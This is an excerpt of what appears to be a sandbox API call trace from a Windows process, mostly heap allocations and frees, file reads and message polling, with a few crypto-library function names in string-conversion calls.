[0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.280] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.281] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0038.282] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4996, lpOverlapped=0x0) returned 1 [0038.283] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14996) returned 0xac0018 [0038.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14996) returned 0x935008 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.286] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14996) returned 0xac0018 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.287] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14996) returned 0xac0018 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0038.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14996) returned 0x9499a8 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.290] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.290] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0038.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.291] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.291] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.292] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0038.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.292] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0038.293] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.294] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.295] HeapFree (in: 